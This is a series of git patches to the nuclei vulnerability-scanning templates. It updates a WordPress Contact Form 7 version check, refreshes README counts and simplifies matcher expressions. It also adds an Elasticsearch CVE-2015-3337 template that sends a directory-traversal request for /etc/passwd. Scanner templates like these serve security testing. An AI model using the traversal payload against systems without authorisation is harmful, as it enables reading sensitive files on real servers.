a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index f4e2bbd516..38c6fb3ae6 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -4,8 +4,9 @@ info: name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 - tags: cve,cve2020,wordpress,plugin + description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 + tags: cve,cve2020,wordpress,wp-plugin requests: - method: GET @@ -17,100 +18,13 @@ requests: - type: status status: - 200 + - type: word words: - "Contact Form 7" - condition: and - part: body - - type: word - words: - - "2.0.7" - - "2.1" - - "2.1.2" - - "2.2" - - "2.2.1" - - "2.3" - - "2.3.1" - - "2.4" - - "2.4.1" - - "2.4.2" - - "2.4.3" - - "2.4.4" - - "2.4.5" - - "2.4.6" - - "3.0" - - "3.0.1" - - "3.0.2" - - "3.1" - - "3.1.1" - - "3.1.2" - - "3.2" - - "3.3" - - "3.3.1" - - "3.3.2" - - "3.3.3" - - "3.4" - - "3.4.1" - - "3.4.2" - - "3.5" - - "3.5.1" - - "3.5.2" - - "3.5.3" - - "3.5.4" - - "3.6" - - "3.7" - - "3.7.1" - - "3.7.2" - - "3.8" - - "3.8.1" - - "3.9" - - "3.9.1" - - "3.9.2" - - "3.9.3" - - "4.0" - - "4.0.1" - - "4.0.2" - - "4.0.3" - - "4.1" - - "4.1.1" - - "4.1.2" - - "4.2" - - "4.2.1" - - "4.2.2" - - "4.3" - - "4.3.1" - - "4.4" - - "4.4.1" - - "4.4.2" - - "4.5" - - "4.5.1" - - "4.6" - - "4.6.1" - - "4.7" - - "4.8" - - "4.8.1" - - "4.9" - - "4.9.1" - - "4.9.2" - - "5.0" - - "5.0.1" - - "5.0.2" - - "5.0.3" - - "5.0.4" - - "5.0.5" - - "5.1" - - "5.1.1" - - "5.1.2" - - "5.1.4" - - "5.1.5" - - "5.1.6" - - "5.1.7" - - "5.1.8" - - "5.1.9" - - "5.2" - - "5.2.1" - - "5.2.2" - - "5.3" - - "5.3.1" - condition: or part: body + + - type: regex + regex: + - '^([0-4]\.|5\.[0-2]\.|5\.3\.[0-1]$)' + part: body \ No newline at end of file diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 615b50315d..32ba1cd033 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -26,6 +26,7 @@ workflows: - template: cves/2020/CVE-2020-13700.yaml - template: cves/2020/CVE-2020-14092.yaml - template: cves/2020/CVE-2020-35951.yaml + - template: cves/2020/CVE-2020-35489.yaml - template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml - template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml - template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml From 50758eecf16724a9b0503067eca37bc03f876649 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 19:59:56 +0000 Subject: [PATCH 61/64] Auto Update README [Wed Mar 24 19:59:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8299180c41..53ab71566f 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 256 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 257 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 7 | -**79 directories, 838 files**. +**79 directories, 839 files**. From 282dfa1c5c953d4130c676c5b1f90457e286014f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 25 Mar 2021 02:21:43 +0530 Subject: [PATCH 62/64] Added CVE-2015-3337 --- cves/2015/CVE-2015-3337.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2015/CVE-2015-3337.yaml diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml new file mode 100644 index 0000000000..faf005e404 --- /dev/null +++ b/cves/2015/CVE-2015-3337.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-3337 + +info: + name: Elasticsearch Head plugin LFI + author: pdteam + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-3337 + tags: cve,cve2015,elastic,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From dee7983a4b870c95ed8d9132f98afbe78c94984c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 20:53:04 +0000 Subject: [PATCH 63/64] Auto Update README [Wed Mar 24 20:53:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 53ab71566f..91e253eebe 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 257 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 258 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 7 | -**79 directories, 839 files**. +**79 directories, 840 files**. From 351167e91f194cb5bde53ea9f148321299296565 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Thu, 25 Mar 2021 00:28:50 +0100 Subject: [PATCH 64/64] removing redundant boolean check --- cves/2019/CVE-2019-11869.yaml | 4 ++-- cves/2020/CVE-2020-17518.yaml | 2 +- exposures/configs/circleci-config.yaml | 2 +- exposures/configs/composer-config.yaml | 4 ++-- exposures/configs/docker-compose-config.yml | 2 +- misconfiguration/put-method-enabled.yaml | 2 +- vulnerabilities/other/powercreator-cms-rce.yaml | 2 +- 7 files changed, 9 insertions(+), 9 deletions(-) diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 8a92db1344..508c96e9e2 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -38,8 +38,8 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "") == true' + - 'contains(body_2, "")' - type: dsl dsl: - - "contains(tolower(all_headers_2), 'text/html') == true" \ No newline at end of file + - "contains(tolower(all_headers_2), 'text/html')" \ No newline at end of file diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 540b0b914c..b219a24a35 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -33,4 +33,4 @@ requests: matchers: - type: dsl dsl: - - 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this. + - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index 294bb13505..d5b08e40cd 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: dsl dsl: - - 'regex("^version: ", body) && contains(body, "jobs:") == true' + - 'regex("^version: ", body) && contains(body, "jobs:")' - type: status status: diff --git a/exposures/configs/composer-config.yaml b/exposures/configs/composer-config.yaml index 8fe5d67e0a..526204ece8 100644 --- a/exposures/configs/composer-config.yaml +++ b/exposures/configs/composer-config.yaml @@ -17,9 +17,9 @@ requests: - type: dsl name: composer.lock dsl: - - "contains(body, 'packages') == true && contains(tolower(all_headers), 'application/octet-stream') == true && status_code == 200" + - "contains(body, 'packages') && contains(tolower(all_headers), 'application/octet-stream') && status_code == 200" - type: dsl name: composer.json dsl: - - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200" + - "contains(body, 'require') && contains(tolower(all_headers), 'application/json') && status_code == 200" diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yml index 1a6259d516..a7adf672ab 100644 --- a/exposures/configs/docker-compose-config.yml +++ b/exposures/configs/docker-compose-config.yml @@ -22,7 +22,7 @@ requests: matchers: - type: dsl dsl: - - 'regex("^version: ", body) && contains(body, "services:") == true' + - 'regex("^version: ", body) && contains(body, "services:")' - type: status status: diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 107c7ce6b2..d63227fd37 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -24,4 +24,4 @@ requests: - type: dsl name: multi-req dsl: - - 'contains(body_2, "testing-payload") == true' + - 'contains(body_2, "testing-payload")' diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index a106b40392..9b8b5067f9 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -41,4 +41,4 @@ requests: matchers: - type: dsl dsl: - - "contains(body, 'Poc_Test') == true && status_code == 200" \ No newline at end of file + - "contains(body, 'Poc_Test') && status_code == 200" \ No newline at end of file